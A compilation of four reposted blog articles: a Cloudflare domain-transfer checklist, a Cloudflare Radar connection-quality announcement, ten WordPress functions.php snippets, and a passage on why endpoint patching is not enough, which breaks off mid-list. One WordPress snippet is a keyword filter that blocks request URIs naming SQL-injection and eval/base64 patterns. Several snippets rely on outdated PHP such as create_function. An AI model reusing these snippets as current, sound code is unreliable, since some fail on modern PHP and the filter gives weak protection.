A step-by-step guide to transferring domains to Cloudflare

23/06/2023

Transferring your domains to a new registrar isn’t something you do every day, and getting any step of the process wrong could mean downtime and disruption. That’s why this Speed Week we’ve prepared a domain transfer checklist. We want to empower anyone to quickly transfer their domains to Cloudflare Registrar, without worrying about missing any steps along the way or being left with any unanswered questions.

Domain Transfer Checklist

Confirm eligibility

  • Confirm you want to use Cloudflare’s nameservers: We built our registrar specifically for customers who want to use other Cloudflare products. This means domains registered with Cloudflare can only use our nameservers. If your domain requires non-Cloudflare nameservers then we’re not the right registrar for you.
  • Confirm Cloudflare supports your domain’s TLD: You can view the full list of TLDs we currently support hereNote: We plan to support .dev and .app by mid-July 2023.
  • Confirm your domain is not a premium domain or internationalized domain name (IDNs): Cloudflare currently does not support premium domains or internationalized domain names (Unicode).
  • Confirm your domain hasn’t been registered or transferred in the past 60 days: ICANN rules prohibit a domain from being transferred if it has been registered or previously transferred within the last 60 days.
  • Confirm your WHOIS Registrant contact information hasn’t been updated in the past 60 days: ICANN rules also prohibit a domain from being transferred if the WHOIS Registrant contact information was modified in the past 60 days.

Before you transfer

  • Gather your credentials for your current registrar: Make sure you have your credentials for your current registrar. It’s possible you haven’t logged in for many years and you may have to reset your password.
  • Make note of your current DNS settings: Make note of your current DNS settings: When transferring your domain, Cloudflare will automatically scan your DNS records, but you’ll want to capture your current settings in case there are any issues. If your current provider supports it, you could use the standard BIND Zone File format to export your records.
  • Remove WHOIS privacy (if necessary): In most cases, domains may be transferred even if WHOIS privacy services have been enabled. However, some registrars may prohibit the transfer if the WHOIS privacy service has been enabled.
  • Disable DNSSEC: You can disable DNSSEC by removing the DS record at your current DNS host and disabling DNSSEC in the Cloudflare dashboard.
  • Renew your domain if up for renewal in the next 15 days: If your domain is up for renewal, you’ll need to renew it with your current registrar before initiating a transfer to Cloudflare.
  • Unlock the domain: Registrars include a lightweight safeguard to prevent unauthorized users from starting domain transfers – often called a registrar or domain lock. This lock prevents any other registrar from attempting to initiate a transfer. Only the registrant can enable or disable this lock, typically through the administration interface of the registrar.
  • Sign up for Cloudflare: If you don’t already have a Cloudflare account, you can sign up here.
  • Add your domain to Cloudflare: You can add a new domain to your Cloudflare account by following these instructions.
  • Add a valid credit card to your Cloudflare account: If you haven’t already added a payment method into your  Cloudflare dashboard billing profile, you’ll be prompted to add one when you add your domain.
  • Review DNS records at Cloudflare: Once you’ve added your domain, review the DNS records that Cloudflare automatically configured with what you have at your current registrar to make sure nothing was missed.
  • Change your DNS nameservers to Cloudflare: In order to transfer your domain, your nameservers will need to be set to Cloudflare.
  • (optional) Configure Cloudflare Email Routing: If you’re using email forwarding, ensure that you follow this guide to migrate to Cloudflare Email Routing.
  • Wait for your DNS changes to propagate: Registrars can take up to 24 hours to process nameserver updates. You will receive an email when Cloudflare has confirmed that these changes are in place. You can’t proceed with transferring your domain until this process is complete.

Initiating and confirming transfer process

  • Request an authorization code: Cloudflare needs to confirm with your old registrar that the transfer flow is authorized. To do that, your old registrar will provide an authorization code to you. This code is often referred to as an authorization code, auth code, authinfo code, or transfer code. You will need to input that code to complete your transfer to Cloudflare. We will use it to confirm the transfer is authentic.
  • Initiate your transfer to Cloudflare: Visit the Transfer Domains section of your Cloudflare dashboard. Here you’ll be presented with any domains available for transfer. If your domain isn’t showing, ensure you completed all the proceeding steps. If you have, review the list on this page to see if any apply to your domain.
  • Review the transfer price: When you transfer a domain, you are required by ICANN to pay to extend its registration by one year from the expiration date. You will not be billed at this step. Cloudflare will only bill your card when you input the auth code and confirm the contact information at the conclusion of your transfer request.
  • Input your authorization code: In the next page, input the authorization code for each domain you are transferring.
  • Confirm or input your contact information: In the final stage of the transfer process, input the contact information for your registration. Cloudflare Registrar redacts this information by default but is required to collect the authentic contact information for this registration.
  • Approve the transfer with Cloudflare: Once you have requested your transfer, Cloudflare will begin processing it, and send a Form of Authorization (FOA) email to the registrant, if the information is available in the public WHOIS database. The FOA is what authorizes the domain transfer.
  • Approve the transfer with your previous registrar: After this step, your previous registrar will also email you to confirm your request to transfer. Most registrars will include a link to confirm the transfer request. If you follow that link, you can accelerate the transfer operation. If you do not act on the email, the registrar can wait up to five days to process the transfer to Cloudflare. You may also be able to approve the transfer from within your current registrar dashboard.
  • Follow your transfer status in your Cloudflare dashboard: Your domain transfer status will be viewable under Account Home > Overview > Domain Registration for your domain.

After you transfer

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/a-step-by-step-guide-to-transferring-domains-to-cloudflare/

Introducing the Cloudflare Radar Internet Quality Page

23/06/2023

Internet connections are most often marketed and sold on the basis of “speed”, with providers touting the number of megabits or gigabits per second that their various service tiers are supposed to provide. This marketing has largely been successful, as most subscribers believe that “more is better”. Furthermore, many national broadband plans in countries around the world include specific target connection speeds. However, even with a high speed connection, gamers may encounter sluggish performance, while video conference participants may experience frozen video or audio dropouts. Speeds alone don’t tell the whole story when it comes to Internet connection quality.

Additional factors like latency, jitter, and packet loss can significantly impact end user experience, potentially leading to situations where higher speed connections actually deliver a worse user experience than lower speed connections. Connection performance and quality can also vary based on usage – measured average speed will differ from peak available capacity, and latency varies under loaded and idle conditions.

The new Cloudflare Radar Internet Quality page

A little more than three years ago, as residential Internet connections were strained because of the shift towards working and learning from home due to the COVID-19 pandemic, Cloudflare announced the speed.cloudflare.com speed test tool, which enabled users to test the performance and quality of their Internet connection. Within the tool, users can download the results of their individual test as a CSV, or share the results on social media. However, there was no aggregated insight into Cloudflare speed test results at a network or country level to provide a perspective on connectivity characteristics across a larger population.

Today, we are launching these long-missing aggregated connection performance and quality insights on Cloudflare Radar. The new Internet Quality page provides both country and network (autonomous system) level insight into Internet connection performance (bandwidth) and quality (latencyjitter) over time. (Your Internet service provider is likely an autonomous system with its own autonomous system number (ASN), and many large companies, online platforms, and educational institutions also have their own autonomous systems and associated ASNs.) The insights we are providing are presented across two sections: the Internet Quality Index (IQI), which estimates average Internet quality based on aggregated measurements against a set of Cloudflare & third-party targets, and Connection Quality, which presents peak/best case connection characteristics based on speed.cloudflare.com test results aggregated over the previous 90 days. (Details on our approach to the analysis of this data are presented below.)

Users may note that individual speed test results, as well as the aggregate speed test results presented on the Internet Quality page will likely differ from those presented by other speed test tools. This can be due to a number of factors including differences in test endpoint locations (considering both geographic and network distance), test content selection, the impact of “rate boosting” by some ISPs, and testing over a single connection vs. multiple parallel connections. Infrequent testing (on any speed test tool) by users seeking to confirm perceived poor performance or validate purchased speeds will also contribute to the differences seen in the results published by the various speed test platforms.

And as we announced in April, Cloudflare has partnered with Measurement Lab (M-Lab) to create a publicly-available, queryable repository for speed test results. M-Lab is a non-profit third-party organization dedicated to providing a representative picture of Internet quality around the world. M-Lab produces and hosts the Network Diagnostic Tool, which is a very popular network quality test that records millions of samples a day. Given their mission to provide a publicly viewable, representative picture of Internet quality, we chose to partner with them to provide an accurate view of your Internet experience and the experience of others around the world using openly available data.

Connection speed & quality data is important

While most advertisements for fixed broadband and mobile connectivity tend to focus on download speeds (and peak speeds at that), there’s more to an Internet connection, and the user’s experience with that Internet connection, than that single metric. In addition to download speeds, users should also understand the upload speeds that their connection is capable of, as well as the quality of the connection, as expressed through metrics known as latency and jitter. Getting insight into all of these metrics provides a more well-rounded view of a given Internet connection, or in aggregate, the state of Internet connectivity across a geography or network.

The concept of download speeds are fairly well understood as a measure of performance. However, it is important to note that the average download speeds experienced by a user during common Web browsing activities, which often involves the parallel retrieval of multiple smaller files from multiple hosts, can differ significantly from peak download speeds, where the user is downloading a single large file (such as a video or software update), which allows the connection to reach maximum performance. The bandwidth (speed) available for upload is sometimes mentioned in ISP advertisements, but doesn’t receive much attention. (And depending on the type of Internet connection, there’s often a significant difference between the available upload and download speeds.) However, the importance of upload came to the forefront in 2020 as video conferencing tools saw a surge in usage as both work meetings and school classes shifted to the Internet during the COVID-19 pandemic. To share your audio and video with other participants, you need sufficient upload bandwidth, and this issue was often compounded by multiple people sharing a single residential Internet connection.

Latency is the time it takes data to move through the Internet, and is measured in the number of milliseconds that it takes a packet of data to go from a client (such as your computer or mobile device) to a server, and then back to the client. In contrast to speed metrics, lower latency is preferable. This is especially true for use cases like online gaming where latency can make a difference between a character’s life and death in the game, as well as video conferencing, where higher latency can cause choppy audio and video experiences, but it also impacts web page performance. The latency metric can be further broken down into loaded and idle latency. The former measures latency on a loaded connection, where bandwidth is actively being consumed, while the latter measures latency on an “idle” connection, when there is no other network traffic present. (These specific loaded and idle definitions are from the device’s perspective, and more specifically, from the speed test application’s perspective. Unless the speed test is being performed directly from a router, the device/application doesn’t have insight into traffic on the rest of the network.) Jitter is the average variation found in consecutive latency measurements, and can be measured on both idle and loaded connections. A lower number means that the latency measurements are more consistent. As with latency, Internet connections should have minimal jitter, which helps provide more consistent performance.

Our approach to data analysis

The Internet Quality Index (IQI) and Connection Quality sections get their data from two different sources, providing two different (albeit related) perspectives. Under the hood they share some common principles, though.

IQI builds upon the mechanism we already use to regularly benchmark ourselves against other industry players. It is based on end user measurements against a set of Cloudflare and third-party targets, meant to represent a pattern that has become very common in the modern Internet, where most content is served from distribution networks with points of presence spread throughout the world. For this reason, and by design, IQI will show worse results for regions and Internet providers that rely on international (rather than peering) links for most content.

IQI is also designed to reflect the traffic load most commonly associated with web browsing, rather than more intensive use. This, and the chosen set of measurement targets, effectively biases the numbers towards what end users experience in practice (where latency plays an important role in how fast things can go).

For each metric covered by IQI, and for each ASN, we calculate the 25th percentile, median, and 75th percentile at 15 minute intervals. At the country level and above, the three calculated numbers for each ASN visible from that region are independently aggregated. This aggregation takes the estimated user population of each ASN into account, biasing the numbers away from networks that source a lot of automated traffic but have few end users.

The Connection Quality section gets its data from the Cloudflare Speed Test tool, which exercises a user’s connection in order to see how well it is able to perform. It measures against the closest Cloudflare location, providing a good balance of realistic results and network proximity to the end user. We have a presence in 285 cities around the world, allowing us to be pretty close to most users.

Similar to the IQI, we calculate the 25th percentile, median, and 75th percentile for each ASN. But here these three numbers are immediately combined using an operation called the trimean — a single number meant to balance the best connection quality that most users have, with the best quality available from that ASN (users may not subscribe to the best available plan for a number of reasons).

Because users may choose to run a speed test for different motives at different times, and also because we take privacy very seriously and don’t record any personally identifiable information along with test results, we aggregate at 90-day intervals to capture as much variability as we can.

At the country level and above, the calculated trimean for each ASN in that region is aggregated. This, again, takes the estimated user population of each ASN into account, biasing the numbers away from networks that have few end users but which may still have technicians using the Cloudflare Speed Test to assess the performance of their network.

The new Internet Quality page includes three views: Global, country-level, and autonomous system (AS). In line with the other pages on Cloudflare Radar, the country-level and AS pages show the same data sets, differing only in their level of aggregation. Below, we highlight the various components of the Internet Quality page.

Global

The top section of the global (worldwide) view includes time series graphs of the Internet Quality Index metrics aggregated at a continent level. The time frame shown in the graphs is governed by the selection made in the time frame drop down at the upper right of the page, and at launch, data for only the last three months is available. For users interested in examining a specific continent, clicking on the other continent names in the legend removes them from the graph. Although continent-level aggregation is still rather coarse, it still provides some insight into regional Internet quality around the world.

Further down the page, the Connection Quality section presents a choropleth map, with countries shaded according to the values of the speed, latency, or jitter metric selected from the drop-down menu. Hovering over a country displays a label with the country’s name and metric value, and clicking on the country takes you to the country’s Internet Quality page. Note that in contrast to the IQI section, the Connection Quality section always displays data aggregated over the previous 90 days.

Country-level

Within the country-level page (using Canada as an example in the figures below), the country’s IQI metrics over the selected time frame are displayed. These time series graphs show the median bandwidth, latency, and DNS response time within a shaded band bounded at the 25th and 75th percentile and represent the average expected user experience across the country, as discussed in the Our approach to data analysis section above.

Below that is the Connection Quality section, which provides a summary view of the country’s measured upload and download speeds, as well as latency and jitter, over the previous 90 days. The colored wedges in the Performance Summary graph are intended to illustrate aggregate connection quality at a glance, with an “ideal” connection having larger upload and download wedges and smaller latency and jitter wedges. Hovering over the wedges displays the metric’s value, which is also shown in the table to the right of the graph.

Below that, the Bandwidth and Latency/Jitter histograms illustrate the bucketed distribution of upload and download speeds, and latency and jitter measurements. In some cases, the speed histograms may show a noticeable bar at 1 Gbps, or 1000 ms (1 second) on the latency/jitter histograms. The presence of such a bar indicates that there is a set of measurements with values greater than the 1 Gbps/1000 ms maximum histogram values.

Autonomous system level

Within the upper-right section of the country-level page, a list of the top five autonomous systems within the country is shown. Clicking on an ASN takes you to the Performance page for that autonomous system. For others not displayed in the top five list, you can use the search bar at the top of the page to search by autonomous system name or number. The graphs shown within the AS level view are identical to those shown at a country level, but obviously at a different level of aggregation. You can find the ASN that you are connected to from the My Connection page on Cloudflare Radar.

Exploring connection performance & quality data

Digging into the IQI and Connection Quality visualizations can surface some interesting observations, including characterizing Internet connections, and the impact of Internet disruptions, including shutdowns and network issues. We explore some examples below.

Characterizing Internet connections

Verizon FiOS is a residential fiber-based Internet service available to customers in the United States. Fiber-based Internet services (as opposed to cable-based, DSL, dial-up, or satellite) will generally offer symmetric upload and download speeds, and the FiOS plans page shows this to be the case, offering 300 Mbps (upload & download), 500 Mbps (upload & download), and “1 Gig” (Verizon claims average wired speeds between 750-940 Mbps download / 750-880 Mbps upload) plans. Verizon carries FiOS traffic on AS701 (labeled UUNET due to a historical acquisition), and in looking at the bandwidth histogram for AS701, several things stand out. The first is a rough symmetry in upload and download speeds. (A cable-based Internet service provider, in contrast, would generally show a wide spread of download speeds, but have upload speeds clustered at the lower end of the range.) Another is the peaks around 300 Mbps and 750 Mbps, suggesting that the 300 Mbps and “1 Gig” plans may be more popular than the 500 Mbps plan. It is also clear that there are a significant number of test results with speeds below 300 Mbps. This is due to several factors: one is that Verizon also carries lower speed non-FiOS traffic on AS701, while another is that erratic nature of in-home WiFi often means that the speeds achieved on a test will be lower than the purchased service level.

Traffic shifts drive latency shifts

On May 9, 2023, the government of Pakistan ordered the shutdown of mobile network services in the wake of protests following the arrest of former Prime Minister Imran Khan. Our blog post covering this shutdown looked at the impact from a traffic perspective. Within the post, we noted that autonomous systems associated with fixed broadband networks saw significant increases in traffic when the mobile networks were shut down – that is, some users shifted to using fixed networks (home broadband) when mobile networks were unavailable.

Examining IQI data after the blog post was published, we found that the impact of this traffic shift was also visible in our latency data. As can be seen in the shaded area of the graph below, the shutdown of the mobile networks resulted in the median latency dropping about 25% as usage shifted from higher latency mobile networks to lower latency fixed broadband networks. An increase in latency is visible in the graph when mobile connectivity was restored on May 12.

Bandwidth shifts as a potential early warning sign

On April 4, UK mobile operator Virgin Media suffered several brief outages. In examining the IQI bandwidth graph for AS5089, the ASN used by Virgin Media (formerly branded as NTL), indications of a potential problem are visible several days before the outages occurred, as median bandwidth dropped by about a third, from around 35 Mbps to around 23 Mbps. The outages are visible in the circled area in the graph below. Published reports indicate that the problems lasted into April 5, in line with the lower median bandwidth measured through mid-day.

Submarine cable issues cause slower browsing

On June 5, Philippine Internet provider PLDT Tweeted an advisory that noted “One of our submarine cable partners confirms a loss in some of its internet bandwidth capacity, and thus causing slower Internet browsing.” IQI latency and bandwidth graphs for AS9299, a primary ASN used by PLDT, shows clear shifts starting around 06:45 UTC (14:45 local time). Median bandwidth dropped by half, from 17 Mbps to 8 Mbps, while median latency increased by 75% from 37 ms to around 65 ms. 75th percentile latency also saw a significant increase, nearly tripling from 63 ms to 180 ms coincident with the reported submarine cable issue.

Conclusion

Making network performance and quality insights available on Cloudflare Radar supports Cloudflare’s mission to help build a better Internet. However, we’re not done yet – we have more enhancements planned. These include making data available at a more granular geographical level (such as state and possibly city), incorporating AIM scores to help assess Internet quality for specific types of use cases, and embedding the Cloudflare speed test directly on Radar using the open source JavaScript module.

In the meantime, we invite you to use speed.cloudflare.com to test the performance and quality of your Internet connection, share any country or AS-level insights you discover on social media (tag @CloudflareRadar on Twitter or @radar@cloudflare.social on Mastodon), and explore the underlying data through the M-Lab repository or the Radar API.

Watch on Cloudflare TV

https://customer-rhnwzxvb3mg4wz3v.cloudflarestream.com/debcbed2114d086c870059ac604eca49/iframe?preload=true&poster=https%3A%2F%2Fcustomer-rhnwzxvb3mg4wz3v.cloudflarestream.com%2Fdebcbed2114d086c870059ac604eca49%2Fthumbnails%2Fthumbnail.jpg%3Ftime%3D1s%26height%3D600

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

 Discuss on Hacker News

Source :
https://blog.cloudflare.com/introducing-radar-internet-quality-page/

10 Useful Code Snippets for WordPress Users

LAST UPDATED: APRIL 26, 2023

We know that plugins can be used to extend the functionality of WordPress. But what if you can do some smaller things in WordPress without installing them? Say, you dislike the admin bar at the top and wish to eliminate it? Yes, that can be accomplished by means of code snippets for WordPress.

Basically, code snippets for WordPress are used to do certain actions that might otherwise require a dedicated smaller plugin. Such code snippets are placed in one of the WordPress core or theme files (generally the functions.php file of your theme).

10 useful #code #snippets for #WordPress users 🖥️

CLICK TO TWEET 

In this article, we will share ⏩ ten very useful code snippets for WordPress users. We’ll then wrap it up by explaining ⏩ how you can add these code snippets to your WordPress pages and posts by using a free plugin.

10 Useful Code Snippets for WordPress Users 📚

  1. Allow Contributors to Upload Images
  2. Show Popular Posts Without Plugins
  3. Disable Search in WordPress
  4. Protect Your Site from Malicious Requests
  5. Paginate Your Site Without Plugins
  6. Disable the Admin Bar
  7. Show Post Thumbnails in RSS Feed
  8. Change the Author Permalink Structure
  9. Automatically Link to Twitter Usernames in Content
  10. Create a PayPal Donation Shortcode

Word of Caution! ✋

As you might have guessed, code snippets for WordPress, while really useful, tend to alter the default functionality. There can be a small margin of error with each snippet. Generally, such issues tend to arise due to incompatible plugins and/or themes and tend to disappear once you eliminate the said theme/plugin or decide not to use the said snippet.

However, to be on the safer side, be very sure to take proper backups of your WordPress website before making any changes by means of snippets. Also, if you encounter any error or performance issues, rollback your site and check for any plugins or incompatible theme issues.

Now, on to the code snippets for WordPress users!

1. Allow Contributors to Upload Images

By default, WordPress does not permit contributor accounts to upload images. You can, of course, promote that particular account to Author or Editor and this will give them the rights to upload and modify images, However, it will also grant them additional rights, such as the ability to publish their own articles (as opposed to submission for review).

This particular code snippet allows contributor accounts to upload images to their articles, without granting them any additional privileges or rights. Paste it in the functions.php file of your theme:

if ( current_user_can('contributor') && !current_user_can('upload_files') )
     add_action('admin_init', 'allow_contributor_uploads');      
     function allow_contributor_uploads() {
          $contributor = get_role('contributor');
          $contributor->add_cap('upload_files');
     }

This one is a little trickier. However, if you are not too keen on installing an extra plugin to showcase popular posts (say, you have limited server memory or disk space), follow this snippet.

Paste the following in functions.php:

function count_post_visits() {
    if( is_single() ) {
        global $post;
        $views = get_post_meta( $post->ID, 'my_post_viewed', true );
        if( $views == '' ) {
            update_post_meta( $post->ID, 'my_post_viewed', '1' );   
        } else {
            $views_no = intval( $views );
            update_post_meta( $post->ID, 'my_post_viewed', ++$views_no );
        }
    }
}
add_action( 'wp_head', 'count_post_visits' );

Thereafter, paste the following wherever in your template files that you wish to display the popular posts:

$popular_posts_args = array(
    'posts_per_page' => 3,
    'meta_key' => 'my_post_viewed',
    'orderby' => 'meta_value_num',
    'order'=> 'DESC'
);
$popular_posts_loop = new WP_Query( $popular_posts_args );
  while( $popular_posts_loop->have_posts() ):
    $popular_posts_loop->the_post();
    // Loop continues
endwhile;
wp_reset_query();

3. Disable Search in WordPress

The search feature of WordPress has been around for a long time. However, if your website does not need it, or you do not want users to “search” through your website for some reason, you can use this code snippet.

Essentially, it is a custom function that simply nullifies the search feature. Not just the search bar in your sidebar or the menu, but the entire concept of native WP search is gone. Why can this be useful? Again, it can help if you are running your website on low spec server and do not have content that needs to be searched (probably you aren’t running a blog).

Again, add this to the functions.php file:

function fb_filter_query( $query, $error = true ) {
if ( is_search() ) {
$query->is_search = false;
$query->query_vars[s] = false;
$query->query[s] = false;
// to error
if ( $error == true )
$query->is_404 = true;
}
}
add_action( 'parse_query', 'fb_filter_query' );
add_filter( 'get_search_form', create_function( '$a', "return null;" ) );

4. Protect Your Site from Malicious Requests

There are various ways to secure your website. You can install a security plugin, turn on a firewall or opt for a free feature such as Jetpack Protect that blocks brute force attacks on your website.

The following code snippet, once placed in your functions.php file, rejects all malicious URL requests:

global $user_ID; if($user_ID) {
    if(!current_user_can('administrator')) {
        if (strlen($_SERVER['REQUEST_URI']) > 255 ||
            stripos($_SERVER['REQUEST_URI'], "eval(") ||
            stripos($_SERVER['REQUEST_URI'], "CONCAT") ||
            stripos($_SERVER['REQUEST_URI'], "UNION+SELECT") ||
            stripos($_SERVER['REQUEST_URI'], "base64")) {
                @header("HTTP/1.1 414 Request-URI Too Long");
                @header("Status: 414 Request-URI Too Long");
                @header("Connection: Close");
                @exit;
        }
    }
}

5. Paginate Your Site Without Plugins

Good pagination is very useful for allowing users to browse through your website. Rather than “previous” or “next” links. This is where another one of our code snippets for WordPress comes into play – it adds good pagination to your content.

In functions.php:

global $wp_query;
$total = $wp_query->max_num_pages;
// only bother with the rest if we have more than 1 page!
if ( $total > 1 )  {
     // get the current page
     if ( !$current_page = get_query_var('paged') )
          $current_page = 1;
     // structure of "format" depends on whether we're using pretty permalinks
     $format = empty( get_option('permalink_structure') ) ? '&page=%#%' : 'page/%#%/';
     echo paginate_links(array(
          'base' => get_pagenum_link(1) . '%_%',
          'format' => $format,
          'current' => $current_page,
          'total' => $total,
          'mid_size' => 4,
          'type' => 'list'
     ));
}

6. Disable the Admin Bar

The WordPress Admin Bar provides handy links to several key functions such as the ability to add new posts and pages, etc. However, if you find no use for it and wish to remove it, simply paste the following code snippet to your functions.php file:

// Remove the admin bar from the front end
add_filter( 'show_admin_bar', '__return_false' );

7. Show Post Thumbnails in RSS Feed

If you wish to show post thumbnail images in your blog’s RSS feed, the following code snippet for WordPress can be useful.

Place it in your functions.php file:

// Put post thumbnails into rss feed
function wpfme_feed_post_thumbnail($content) {
global $post;
if(has_post_thumbnail($post->ID)) {
$content = '' . $content;
}
return $content;
}
add_filter('the_excerpt_rss', 'wpfme_feed_post_thumbnail');
add_filter('the_content_feed', 'wpfme_feed_post_thumbnail');

By default, WordPress shows author profiles as yoursite.com/author/name. However, you can change it to anything that you like, such as yoursite.com/writer/name

The following code snippet needs to be pasted in the functions.php file. Then, it changes the author permalink structure to “/profile/name”:

add_action('init', 'cng_author_base');
function cng_author_base() {
    global $wp_rewrite;
    $author_slug = 'profile'; // change slug name
    $wp_rewrite->author_base = $author_slug;
}

This is especially useful if you are running a website that focuses a lot on Twitter (probably a viral content site, etc.) The following code snippet for functions.php converts all @ mentions in your content to their respective Twitter profiles.

For example, an @happy mention in your content will be converted to a link to the Twitter account “twitter.com/happy” (“happy” being the username):

function content_twitter_mention($content) {
return preg_replace('/([^a-zA-Z0-9-_&])@([0-9a-zA-Z_]+)/', "$1<a href=\"http://twitter.com/$2\" target=\"_blank\" rel=\"nofollow\">@$2</a>", $content);
}
add_filter('the_content', 'content_twitter_mention');   
add_filter('comment_text', 'content_twitter_mention');

10. Create a PayPal Donation Shortcode

If you are using the PayPal Donate function to accept donations from your website’s visitors, you can use this code snippet to create a shortcode, and thus make donating easier. First, paste the following in your functions.php file:

function donate_shortcode( $atts, $content = null) {
global $post;extract(shortcode_atts(array(
'account' => 'your-paypal-email-address',
'for' => $post->post_title,
'onHover' => '',
), $atts));
if(empty($content)) $content='Make A Donation';
return '<a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business='.$account.'&item_name=Donation for '.$for.'" title="'.$onHover.'">'.$content.'</a>';
}
add_shortcode('donate', 'donate_shortcode');

Then, you can easily use the

[donate] shortcode, such as:

[donate]My Text Here[/donate]

Go to top

How to Add Code Snippets? 🤔

As mentioned with each code snippet, you just need to add the said snippet to the required file. Mostly, you would only need to add code snippets to the functions.php file (in some cases, it can differ).

However, what if you are just not comfortable editing your theme’s files? If that is the case, have no fear. The Code Snippets plugin can help you out!

Code Snippets

Author(s): Code Snippets Pro

Current Version: 3.4.2

Last Updated: July 5, 2023

code-snippets.zip

94%Ratings800,000+InstallsWP 5.0+Requires

It is a simple plugin that lets you add code snippets to your functions.php without any manual file editing. It treats code snippets as individual plugins of their own – you add the code and hit save … and the rest is handled by the Code Snippets plugin.

Once you activate the plugin, you will find a Snippets menu right under “Plugins.” Head to Snippets » Add New:

Code Snippets for WordPress

Add a name for your snippet, paste the snippet in the code area, and then provide a description for your own reference. Once done, activate the snippet and you’re good to go! Even if you change the theme, the code snippet remains functional.

10 useful #code #snippets for #WordPress users 🖥️

CLICK TO TWEET 

This way, you can add and delete code snippets as if they were posts or pages without having to edit theme files at all.

Source :
https://themeisle.com/blog/code-snippets-for-wordpress/#gref

Three Reasons Endpoint Security Can’t Stop With Just Patching

Last updated: June 14, 2023
James Saturnio
Security Unified Endpoint Management

With remote work now commonplace, having a good cyber hygiene program is crucial for organizations who want to survive in today’s threat landscape. This includes promoting a culture of individual cybersecurity awareness and deploying the right security tools, which are both critical to the program’s success. 

Some of these tools include endpoint patching, endpoint detection and response (EDR) solutions and antivirus software. But considering recent cybersecurity reports, they’re no longer enough to reduce your organization’s external attack surface.

Here are three solid reasons, and real-world situations, that happened to organizations that didn’t take this threat seriously.

  1. AI generated polymorphic exploits can bypass leading security tools
  2. Patching failures and patching fatigue are stifling security teams
  3. Endpoint patching only works for known devices and apps
  4. How can organizations reduce their external attack surface?

1. AI generated polymorphic exploits can bypass leading security tools

Recently, AI-generated polymorphic malware has been developed to bypass EDR and antivirus, leaving security teams with blind spots into threats and vulnerabilities.

Real-world example: ChatGPT Polymorphic Malware Evades “Leading” EDR and Antivirus Solutions

In one report, researchers created polymorphic malware by abusing ChatGPT prompts that evaded detection by antivirus software. In a similar report, researchers created a polymorphic keylogging malware that bypassed an industry-leading automated EDR solution.

These exploits achieved this by mutating its code slightly with every iteration and encrypting its malicious code without a command-and-control (C2) communications channel. 

This mutation is not detectable by traditional signature-based and low-level heuristics detection engines. This means that security time gaps are created for a patch to be developed and released, for the patch to be tested for effectiveness, for the security team to prioritize vulnerabilities and for the IT (Information Technology) team to rollout the patches onto affected systems.

In all, this could mean several weeks or months where an organization will need to rely on other security tools to help them protect critical assets until the patching process is completed successfully.
 

2. Patching failures and patching fatigue are stifling security teams

Unfortunately, updates breaking systems because patches haven’t been rigorously tested occur frequently. Also, some updates don’t completely fix all weaknesses, leaving systems vulnerable to more attacks and requiring additional patches to completely fix. 

Real-world example: Suffolk County’s ransomware attack

The Suffolk County government in New York recently released their findings from the forensic investigation of the data breach and ransomware attack, where the Log4j vulnerability was the threat actor’s entry point to breach their systems. The attack started back in December 2021, which was the same time Apache released security patches for these vulnerabilities. 

Even with updates available, patching never took place, resulting in 400 gigabytes of data being stolen including thousands of social security numbers and an initial ransom demand of $2.5 million.

The ransom was never paid but the loss of personal data and employee productivity and subsequent investigation outweighed the cost of updated cyber hygiene appliances and tools and a final ransom demand of $500,000. The county is still trying to recover and restore all their systems today, having already spent $5.5 million. 

Real world example: An errant Windows server update caused me to work 24-hours straight

From personal experience, I once worked 24 hours straight because one Patch Tuesday, a Microsoft Windows server update was automatically downloaded, installed which promptly broke authentication services between the IoT (Internet of Things) clients and the AAA (authentication, authorization and accounting) servers grinding production to a screeching halt.

Our company’s internal customer reference network that was implemented by our largest customers deployed Microsoft servers for Active Directory Certificate Services (ADCS) and Network Policy Servers (NPS) used for 802.1x EAP-TLS authentication for our IoT network devices managed over the air.

This happened a decade ago, but similar recurrences have also occurred over the next several years, including this update from July 2017, where NPS authentication broke for wireless clients and was repeated in May of last year.

At that time, an immediate fix for the errant patch wasn’t available, so I spent the next 22 hours rebuilding the Microsoft servers for the company’s enterprise public key infrastructure (PKI) and AAA services to restore normal operations. The saving grace was we took the original root certificate authority offline, and the server wasn’t affected by the bad update. 

However, we ended up having to revoke all the identity certificates issued by the subordinate certificate authorities to thousands of devices including routers, switches, firewalls and access points and re-enroll them back into the AAA service with new identity certificates.

Learning from this experience, we disabled automatic updates for all Windows servers and took more frequent backups of critical services and data.
 

3. Endpoint patching only works for known devices and apps 

With the pandemic came the shift to Everywhere Work, where employees worked from home, often connecting their personal devices to their organization’s network. This left security teams with a blind spot to shadow IT. With shadow IT, assets go unmanaged, are potentially out-of-date and cause insecure personal devices and leaky applications. 

The resurgence of bring your own device (BYOD) policies and the lack of company-sanctioned secure remote access quickly expanded the organization’s external attack surface, exposing other attack vectors for threat actors to exploit. 

Real-world example: LastPass’ recent breach 

LastPass is a very popular password manager that stores your passwords in an online vault. It has more than 25 million users and 100,000 businesses. Last year, LastPass experienced a massive data breach involving two security incidents.   

The second incident leveraged data stolen during the first breach to target four DevOps engineers, specifically, their home computers. One senior software developer used their personal Windows desktop to access the corporate development sandbox. The desktop also had an unpatched version of Plex Media Server (CVE-2020-5741) installed.

Plex provided a patch for this vulnerability three years ago. Threat actors used this vulnerability to deliver malware, perform privilege escalation (PE), then a remote code execution (RCE) to access LastPass cloud-based storage and steal DevOps secrets and multi-factor (MFA) and Federation databases.

“Unfortunately, the LastPass employee never upgraded their software to activate the patch,” Plex said in a statement. “For reference, the version that addressed this exploit was roughly 75 versions ago.”

If patching isn’t enough, how can organizations reduce their external attack surface?

Cyber hygiene

Employees are the weakest link to an organization’s cyber hygiene program. Inevitably, they’ll forget to update their personal devices, re-use the same weak password to different internet websites, install leaky applications, and click or tap on phishing links contained within an email, attachment, or text message. 

Combat this by promoting a company culture of cybersecurity awareness and practice vigilance that includes: 

· Ensuring the latest software updates are installed on their personal and corporate devices. 

